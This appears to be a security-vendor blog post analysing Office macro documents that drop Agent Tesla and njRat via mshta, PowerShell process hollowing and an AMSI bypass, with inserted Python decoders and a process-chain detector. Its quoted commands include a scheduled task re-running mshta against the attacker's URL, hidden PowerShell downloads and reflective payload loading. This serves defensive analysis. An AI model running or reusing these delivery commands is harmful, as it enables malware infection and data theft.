<!DOCTYPE HTML> <html lang="en" data-template="post-page"> <head> <meta charset="UTF-8"/> <title>Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat | FortiGuard Labs </title> <meta name="keywords" content="microsoft,rat,FortiGuard Labs,FortiGuard Labs Threat Research,Agent Tesla"/> <meta name="description" content="FortiGuard Labs discovered malicious Microsoft Office documents attempting to leverage legitimate websites to execute a shell script and drop malware variants of Agent Tesla and njRat. Read more for details."/> <meta name="template" content="post-page"/> <meta name="viewport" content="width=device-width, initial-scale=1"/> <meta property="og:site_name" content="Fortinet Blog"/> <meta property="og:title" content="Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat | FortiGuard Labs "/> <meta property="og:url" content="https://www.fortinet.com/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat"/> <meta property="og:type" content="article"/> <meta property="og:description" content="FortiGuard Labs discovered malicious Microsoft Office documents attempting to leverage legitimate websites to execute a shell script and drop malware variants of Agent Tesla and njRat. Read more fo…"/> <meta property="og:image" content="https://www.fortinet.com/content/dam/fortinet-blog/article-images/tesla-research-hero.jpg"/> <meta property="twitter:card" content="summary"/> <meta property="twitter:site" content="@Fortinet"/> <meta property="article:author" content="Cara Lin"/> <meta property="article:section" content="FortiGuard Labs Threat Research"/> <meta property="article:published_time" content="2022-10-03T21:50:00.000Z"/> <meta property="article:tag" content="microsoft"/> <meta property="article:tag" content="rat"/> <meta property="article:tag" content="FortiGuard Labs"/> <meta property="article:tag" content="Agent Tesla"/> <link rel="shortcut icon" href="/etc/designs/fortinet-blog/favicon.ico"/> <link rel="canonical" href="https://www.fortinet.com/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat"/> <link rel="stylesheet" href="/etc.clientlibs/fortinet-blog/clientlibs/clientlib-base.min.900b148ab7b87024003111a1245cca9c.css" type="text/css"> </head> <body> <div class="root responsivegrid"> <div 
class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> <div class="b1-header aem-GridColumn aem-GridColumn--default--12"> <header class="b1-header__container"> <div class="b1-header__logo"> <a href="https://www.fortinet.com"> <img class="desktop-logo" src="/content/dam/fortinet-blog/fortinet-logo-white.svg" alt="Fortinet home"/> </a> </div> <div class="b1-header__cta-list"> <a class="b1-header__cta-list-item " href="https://www.fortinet.com/blog"> <span>Blog</span> </a> </div> </header> </div> <section class="b4-hero aem-GridColumn aem-GridColumn--default--12"> <div class="b4-hero__container" style="background-image:url(/content/dam/fortinet-blog/article-images/tesla-research-hero.jpg);"> <div class="b4-hero__text text-container"> <p data-ly-test class="b4-hero__kicker">FortiGuard Labs Threat Research</p> <h1 class="b4-hero__headline">Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat </h1> </div> </div> </section> <section class="b15-blog-meta aem-GridColumn aem-GridColumn--default--12"> <div class="b15-blog-meta__container text-container"> <span>By </span> <span class="b15-blog-meta__author"> <a href="/blog/search?author=Cara+Lin">Cara Lin</a> </span> <span class="b15-blog-meta__date"> | October 03, 2022</span> </div> </section> <div class="responsivegrid aem-GridColumn aem-GridColumn--default--12"> <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>We recently found some malicious Microsoft Office documents that attempted 
to leverage legitimate websites, MediaFire and Blogger, to execute a script through mshta and then drop two malware variants, Agent Tesla and njRat. Agent Tesla is a well-known spyware, first seen in 2014, that can steal personal data from web browsers, mail clients, and FTP clients, capture screenshots and video, and harvest clipboard contents. njRat (also known as Bladabindi) is a remote access Trojan first seen in 2013 that lets an attacker remotely control a victim’s device to log keystrokes, access the camera, steal credentials stored in browsers, upload and download files, manipulate the registry, and more.</p> <p style="margin-left: 40.0px;"><b>Affected platforms: </b>Microsoft Windows<br /> <b>Impacted parties: </b>Windows users<br /> <b>Impact: </b>Control and collect sensitive information from a victim’s device<br /> <b>Severity level:</b> Critical<br /> </p> <p>In this article we detail the documents we discovered, the embedded scripts they use to deliver a payload, and the behavior of the two malware variants.</p> <h2>1<sup>st</sup> Stage</h2> <p>In September 2022 we collected two kinds of files. One is a PowerPoint add-in and the other is a Word document containing a lure image and an embedded Excel form. Both contain similar VBA macros that run automatically as soon as the document is opened and macros are enabled.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_424651011.img.png/1664852999563/screen-shot-2022-10-03-at-20.06.14.png" alt="Images of two kinds of files, one is a PowerPoint Add-in and another is a Word document containing a lure picture and an embedded Excel form." class="custom"/> </noscript> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>The VBA macro in the PPT add-in, shown in Figure 1, runs automatically because it is declared in an “Auto_Open()” procedure. The “ControlTipText” and “Tag” properties of a form control together hold the complete command: “mshta” followed by the MediaFire URL. The full URL can be read directly from “vbaProject.bin”, as Figure 2 shows.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_982425706.img.png/1664579697015/fig1.png" alt="Figure 1: The VBA macro from the PPT add-in" class="custom"/> </noscript> <span class="cmp-image--title">Figure 1: The VBA macro from the PPT add-in</span> </div> <div class="cmp cmp-image aem-GridColumn aem-GridColumn--default--12"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1881471673.img.png/1664579715972/fig2.png" alt="Figure 2: Complete malicious URL in the vbaProject.bin file" class="custom"/> </noscript> <span class="cmp-image--title">Figure 2: Complete malicious URL in the vbaProject.bin file</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>2<sup>nd</sup> Stage</h2> <p>Process Explorer, shown in Figure 3, confirms that an “mshta” process starts right after “Enable Macros” is clicked in the document. mshta then fetches “1.htm” from MediaFire, a legitimate file and picture sharing platform.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_46910527.img.png/1664579739834/fig3.png" alt="Figure 3: Process Explorer after clicking “Enable Macros”" class="custom"/> </noscript> <span class="cmp-image--title">Figure 3: Process Explorer after clicking “Enable Macros”</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Below is the content of “1.htm”, the file the first-stage VBA macro hands to mshta:</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_2063549090.img.png/1664579763402/fig4.png" alt="Figure 4: “1.htm” downloaded from MediaFire" class="custom"/> </noscript> <span class="cmp-image--title">Figure 4: “1.htm” downloaded from MediaFire</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Figure 5 shows the same script after decoding the hex-encoded strings to ASCII.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none 
aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1844464533.img.png/1664579781856/fig5.png" alt="Figure 5: Converted &quot;1.htm&quot;" class="custom"/> </noscript> <span class="cmp-image--title">Figure 5: Converted &quot;1.htm&quot;</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>This HTML file has three main jobs:</p> <ol> <li>Download the third-stage script file from MediaFire</li> <li>Terminate the WINWORD.EXE process</li> <li>Establish persistence by creating a scheduled task that runs every 73 minutes. The task uses “mshta” to fetch “http[:]//www.webclientservices.co[.]uk/p/1[.]html”, a Blogger page that hosts a similar script. The screenshot of that blog page below was taken in September 2022:</li> </ol> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1684193002.img.png/1664579877318/fig6.png" alt="Figure 6: Web page of www[.]webclientservices[.]co[.]uk/p/1[.]html in the middle of September" class="custom"/> </noscript> <span class="cmp-image--title">Figure 6: Web page of www[.]webclientservices[.]co[.]uk/p/1[.]html in the middle of September</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>We also found that the 1.html page on “www[.]webclientservices[.]co[.]uk” had since been updated and retitled “real all BACK SEP 2022”, and that its embedded JavaScript had been changed to deliver other malware. 
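</p> <p>To make the decoding behind Figure 5 and the three jobs listed above concrete, the following Python is an added example written for this page; it is not code from the sample or from FortiGuard Labs. It decodes the character escapes that mshta droppers commonly use to hide their command strings (JScript “\xNN”, unescape(“%NN”), String.fromCharCode(...) and VBScript Chr(&amp;HNN)) and then extracts the indicators an analyst wants from the plaintext: the download URL(s), the process killed by taskkill, and the interval and command of the scheduled task. The HTA text it runs on is constructed to mirror the behaviour described, with a placeholder download URL (example.invalid); the real encoding, URL and field layout are only visible in Figures 4 and 5.</p>

```python
import re
from typing import Dict

# Constructed stand-in for a hex-obfuscated HTA dropper. This is NOT the real "1.htm";
# it only mirrors the three jobs described in the report: the command strings are hidden
# as JScript "\xNN" escapes and the download URL is built from String.fromCharCode()
# codes (the URL itself is a placeholder, example.invalid).
SAMPLE_HTA = r'''<script language="javascript">
var sh = new ActiveXObject("\x57\x53\x63\x72\x69\x70\x74\x2e\x53\x68\x65\x6c\x6c");
sh.Run("\x63\x6d\x64 /c taskkill /f /im WINWORD.EXE", 0);
sh.Run("\x70\x6f\x77\x65\x72\x73\x68\x65\x6c\x6c -w hidden iwr " + String.fromCharCode(104,116,116,112,115,58,47,47,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,49,46,116,120,116) + " -o 1.txt", 0);
sh.Run("schtasks /create /sc minute /mo 73 /tn Update /tr \"mshta http://www.webclientservices.co.uk/p/1.html\" /f", 0);
</script>'''

HEX_JS = re.compile(r"\\x([0-9a-fA-F]{2})")                 # JScript "\x6d"
HEX_VBS = re.compile(r"Chr\(&H([0-9a-fA-F]{2})\)", re.I)    # VBScript Chr(&H6D)
HEX_PCT = re.compile(r"%([0-9a-fA-F]{2})")                  # "%6d", only inside unescape("...")
UNESCAPE = re.compile(r'unescape\(\s*"([^"]*)"\s*\)')
FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")


def decode_hex_strings(text: str) -> str:
    """Turn the character escapes HTA droppers use to hide strings back into ASCII."""
    # String.fromCharCode(104,116,...) -> "ht..."   (decimal code points)
    text = FROMCHARCODE.sub(
        lambda m: '"' + "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()) + '"', text)
    # unescape("%6d%73") -> "ms"   (percent escapes are decoded only inside unescape())
    text = UNESCAPE.sub(
        lambda m: '"' + HEX_PCT.sub(lambda h: chr(int(h.group(1), 16)), m.group(1)) + '"', text)
    # "\x6d" and Chr(&H6D) -> "m"
    for pat in (HEX_JS, HEX_VBS):
        text = pat.sub(lambda m: chr(int(m.group(1), 16)), text)
    return text


URL_RE = re.compile(r"""https?://[^\s"'<>\\]+""")
TASKKILL_RE = re.compile(r"taskkill\b[^\n]*?/im\s+([\w.]+)", re.I)
SCHTASKS_RE = re.compile(
    r'schtasks\s+/create\b[^\n]*?/sc\s+(\w+)\s+/mo\s+(\d+)[^\n]*?/tr\s+\\?"(.*?)\\?"', re.I)


def extract_iocs(decoded: str) -> Dict[str, list]:
    """Pull download URLs, killed processes and scheduled-task persistence out of decoded script text."""
    tasks = [{"every": f"{count} {unit.lower()}", "command": command}
             for unit, count, command in SCHTASKS_RE.findall(decoded)]
    return {
        "urls": sorted(set(URL_RE.findall(decoded))),
        "killed_processes": [m.group(1).upper() for m in TASKKILL_RE.finditer(decoded)],
        "scheduled_tasks": tasks,
    }


if __name__ == "__main__":
    plain = decode_hex_strings(SAMPLE_HTA)
    print(plain)
    for key, value in extract_iocs(plain).items():
        print(f"{key}: {value}")
```

<p>Run it on a real HTA by replacing SAMPLE_HTA with the file contents; anything the decoders do not recognise is left untouched, so a second pass with the file's own trick (for instance a custom decoding function) may still be needed before the IOC regexes find the commands.</p> <p>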
More details are in the following section.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_366289932.img.png/1664579908623/fig7.png" alt="Figure 7: Updated page of www[.]webclientservices[.]co[.]uk/p/1[.]html found at the end of September" class="custom"/> </noscript> <span class="cmp-image--title">Figure 7: Updated page of www[.]webclientservices[.]co[.]uk/p/1[.]html found at the end of September</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>3<sup>rd</sup> Stage</h2> <p>The PowerShell script in “1.txt”, downloaded from MediaFire, delivers the final payload by process hollowing. It first terminates related processes, then decodes the loader and the payload, hands the payload to the loader for injection into a legitimate host process, and finally patches AMSI. 
The main payload and parts of the script are stored as hex strings padded with filler characters, which the script strips by string replacement before decoding; this is there to slow down analysis.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_624902005.img.png/1664579951661/fig8.png" alt="Figure 8: Full picture of the PowerShell used to load Agent Tesla" class="custom"/> </noscript> <span class="cmp-image--title">Figure 8: Full picture of the PowerShell used to load Agent Tesla</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1709765622.img.png/1664579976117/fig9.png" alt="Figure 9: Process Explorer after PowerShell is executed" class="custom"/> </noscript> <span class="cmp-image--title">Figure 9: Process Explorer after PowerShell is executed</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>In the second part of the “Load Agent Tesla Payload” routine, the variables $CLE11 and $RNBX1 hold the final payload and the loader, respectively, once the filler strings have been replaced. 
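</p> <p>The following Python is an added example written for this page, not the loader’s own code or anything taken from the sample: it reproduces the decoding just described by applying a variable’s chain of .Replace() calls to strip the filler tokens, converting the result with the equivalent of HexaToByte, and then checking that what comes out is a PE image (MZ header, e_lfanew, “PE\0\0” signature) before treating it as the carved payload or loader. The PowerShell fragment it parses is constructed in the style of Figure 8; the filler tokens (“~”, “@!”) and the PE blob are stand-ins, since the real values are only visible in the screenshot.</p>

```python
import hashlib
import re
import struct
from typing import Dict, Optional


def _build_fake_pe() -> bytes:
    """Constructed PE-shaped blob: a DOS header whose e_lfanew points at a 'PE\\0\\0' signature
    followed by a COFF file header (Machine = 0x14C, three sections). It is not runnable;
    it only carries the fields the carver validates."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)          # e_lfanew: PE header directly after the DOS header
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


def _obfuscate(blob: bytes, fillers=("~", "@!")) -> str:
    """Hex-encode and interleave filler tokens, the way the loader stores its blobs."""
    hx = blob.hex().upper()
    return "".join(hx[i:i + 2] + fillers[(i // 2) % len(fillers)] for i in range(0, len(hx), 2))


# Constructed PowerShell fragment in the style of Figure 8 (NOT the real 1.txt):
# $CLE11 carries a complete PE image, $RNBX1 is deliberately truncated so the
# validation has something to reject, and $Path is a plain string, not hex.
SAMPLE_PS1 = (
    "$CLE11 = '" + _obfuscate(_build_fake_pe()) + "'.Replace('~','').Replace('@!','')\n"
    "$RNBX1 = '4D~5A~90~00'.Replace('~','')\n"
    "$Path = 'C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe'\n"
)

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*'([^']*)'((?:\.Replace\('[^']*','[^']*'\))*)")
REPLACE_RE = re.compile(r"\.Replace\('([^']*)','([^']*)'\)")


def hexa_to_byte(hex_str: str) -> bytes:
    """Python equivalent of the script's HexaToByte helper; raises ValueError if fillers remain."""
    return bytes.fromhex(hex_str)


def describe_pe(blob: bytes) -> Optional[dict]:
    """Return basic header facts if blob is a PE image, otherwise None."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 24 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, sections = struct.unpack_from("<HH", blob, e_lfanew + 4)
    return {"machine": hex(machine), "sections": sections, "size": len(blob),
            "sha256": hashlib.sha256(blob).hexdigest()}


def carve_payloads(script: str) -> Dict[str, Optional[dict]]:
    """Apply each variable's .Replace() chain, hex-decode it, and keep only valid PE images."""
    found: Dict[str, Optional[dict]] = {}
    for name, literal, chain in ASSIGN_RE.findall(script):
        for old, new in REPLACE_RE.findall(chain):
            literal = literal.replace(old, new)     # .NET String.Replace is ordinal, like Python's
        try:
            blob = hexa_to_byte(literal)
        except ValueError:                          # not hex at all (e.g. $Path)
            found[name] = None
            continue
        found[name] = describe_pe(blob)
    return found


if __name__ == "__main__":
    for var, info in carve_payloads(SAMPLE_PS1).items():
        print(var, "->", info if info else "not a PE image")
```

<p>On a real script, dump each variable that passes describe_pe() to disk (the sha256 gives you a stable name) and open it in dnSpy as done for $RNBX1; the loader is usually the smaller of the two images.</p> <p>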
Depending on which .NET Framework version is installed, the script picks one of three legitimate .NET binaries as the host process for hollowing:</p> <p style="margin-left: 40.0px;"><i>$Path = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe'</i></p> <p style="margin-left: 40.0px;"><i>$Path2 = 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe'</i></p> <p style="margin-left: 40.0px;"><i>$Path3 = 'C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe'</i></p> <p>It then loads the decoded loader assembly from memory and calls its Execute method, passing the chosen host path and the decoded payload:</p> <p style="margin-left: 40.0px;"><i>[Reflection.Assembly]::Load((HexaToByte($RNBX1))).GetType('CALC.PAYSIAS').GetMethod('Execute').Invoke($null, [object[]] ($Path, HexaToByte($CLE11)))</i></p> <p>We dumped $RNBX1 to an executable file and opened it in dnSpy. The target class and method are shown in Figure 10. The .NET loader obfuscates the names of the main Win32 APIs it uses (CreateProcess, VirtualAllocEx, …) to hide the hollowing routine.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1262630417.img.png/1664580062842/fig-10.1.png" alt="Figure 10 (part 1): .NET loader" class="custom"/> </noscript> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1278752504.img.png/1664580079364/fig10.2.png" alt="Figure 10: .NET loader" class="custom"/> </noscript> <span class="cmp-image--title">Figure 10: .NET loader</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>We located the target processes, “jsc.exe”, “caspol.exe” and “Msbuild.exe”, running quietly on the victim’s machine. The details are shown in Figure 11.</p> </div> <div class="cmp cmp-image aem-GridColumn aem-GridColumn--default--12"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_446872097.img.png/1664580105454/fig11.png" alt="Figure 11: Process Explorer while process hollowing" class="custom"/> </noscript> <span class="cmp-image--title">Figure 11: Process Explorer while process hollowing</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>At the end of the PowerShell script, it disables logging and bypasses AMSI by patching it in memory. The detailed steps are shown in Figure 12.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_2063263357.img.png/1664580135865/fig12.png" alt="Figure 12: Bypassing AMSI in PowerShell" class="custom"/> </noscript> <span class="cmp-image--title">Figure 12: Bypassing AMSI in PowerShell</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>Final Stage – Part 1</h2> <p>The first malware payload is Agent Tesla. 
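</p> <p>Before looking at the payload itself, the delivery chain seen in Figures 3, 9 and 11 is worth turning into detection logic. The Python below is an added example written for this page, not a FortiGuard Labs rule: it runs a few rules over process-creation events (an Office application spawning mshta.exe with a URL, a script host running taskkill against WINWORD.EXE, schtasks creating a task that re-runs mshta against a remote page, and PowerShell spawning jsc.exe, caspol.exe or MSBuild.exe) and walks the parent chain so that a .NET host descended from an Office process is flagged with high confidence. The events are constructed in a Sysmon Event ID 1-like shape; the field names, PIDs, paths and the example.invalid URL are assumptions, and a Visual Studio build is included to show that MSBuild.exe on its own does not fire.</p>

```python
import re
from typing import Dict, List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOTNET_HOSTS = {"jsc.exe", "caspol.exe", "msbuild.exe"}     # hollowing targets named in this report
URL_RE = re.compile(r"https?://", re.I)

# Constructed process-creation events in a Sysmon Event ID 1-like shape (field names assumed).
EVENTS: List[dict] = [
    {"pid": 3900, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4100, "ppid": 3900, "image": r"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE",
     "cmdline": '"POWERPNT.EXE" C:\\Users\\victim\\Downloads\\invoice.ppam'},
    {"pid": 4212, "ppid": 4100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/1.htm"},
    {"pid": 4300, "ppid": 4212, "image": r"C:\Windows\System32\taskkill.exe",
     "cmdline": "taskkill /f /im WINWORD.EXE"},
    {"pid": 4310, "ppid": 4212, "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": 'schtasks /create /sc minute /mo 73 /tn Update /tr "mshta http://www.webclientservices.co.uk/p/1.html" /f'},
    {"pid": 4320, "ppid": 4212, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -ep bypass -f C:\\Users\\victim\\AppData\\Local\\Temp\\1.txt"},
    {"pid": 4400, "ppid": 4320, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe",
     "cmdline": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"},
    # Benign control: Visual Studio building a project also launches MSBuild.exe.
    {"pid": 5001, "ppid": 3900, "image": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "cmdline": "devenv.exe"},
    {"pid": 5000, "ppid": 5001, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe App.csproj"},
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(pid: int, by_pid: Dict[int, dict], limit: int = 16) -> List[str]:
    """Image names of the process's parents, nearest first, following the ppid links we have events for."""
    chain: List[str] = []
    cur = by_pid.get(pid)
    while cur is not None and len(chain) < limit:
        cur = by_pid.get(cur["ppid"])
        if cur is not None:
            chain.append(basename(cur["image"]))
    return chain


def detect(events: List[dict]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) pairs for events matching the delivery chain described in this report."""
    by_pid = {e["pid"]: e for e in events}
    alerts: List[Tuple[str, int]] = []
    for e in events:
        name, cmd = basename(e["image"]), e["cmdline"].lower()
        parents = ancestors(e["pid"], by_pid)
        parent = parents[0] if parents else ""
        # Stage 1 -> 2: an Office application spawns a script host that is handed a URL.
        if parent in OFFICE_APPS and name in SCRIPT_HOSTS and URL_RE.search(cmd):
            alerts.append(("office_spawns_script_host_with_url", e["pid"]))
        # 1.htm job 2: a script host (or the shell it started) kills the Office process.
        if name == "taskkill.exe" and parent in (SCRIPT_HOSTS | SHELLS) and any(a in cmd for a in OFFICE_APPS):
            alerts.append(("script_host_kills_office", e["pid"]))
        # 1.htm job 3: persistence through a scheduled task that re-runs mshta against a remote page.
        if name == "schtasks.exe" and "/create" in cmd and "mshta" in cmd and URL_RE.search(cmd):
            alerts.append(("schtasks_persistence_via_remote_hta", e["pid"]))
        # Stage 3: PowerShell spawns one of the .NET binaries used as hollowing hosts.
        if name in DOTNET_HOSTS and parent in SHELLS:
            alerts.append(("powershell_spawns_dotnet_host", e["pid"]))
        # Highest confidence: a .NET host whose ancestry leads back to an Office application.
        if name in DOTNET_HOSTS and any(p in OFFICE_APPS for p in parents):
            alerts.append(("office_to_dotnet_host_chain", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:40s} pid={pid}")
```

<p>The parent walk is what keeps the last rule quiet on the Visual Studio build: MSBuild.exe under devenv.exe has no Office ancestor, while jsc.exe under powershell.exe under mshta.exe under POWERPNT.EXE does. On real telemetry the same rules map directly onto Sysmon Event ID 1 or EDR process events, with ParentImage available instead of having to reconstruct the chain.</p> <p>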
This variant began spreading in the middle of September. Its file version information is copied from a legitimate NirSoft tool, “Web Browser Password Viewer”, and it uses FTP to send out stolen data.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{&quot;smartImages&quot;:[],&quot;smartSizes&quot;:[],&quot;lazyEnabled&quot;:true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_844228499.img.png/1664580164742/fig13.png" alt="Figure 13: Basic information of Agent Tesla" class="custom"/> </noscript> <span class="cmp-image--title">Figure 13: Basic information of Agent Tesla</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Figure 14 shows the attacker’s FTP server details, including the username and password, that the sample uses to upload the extracted data. 
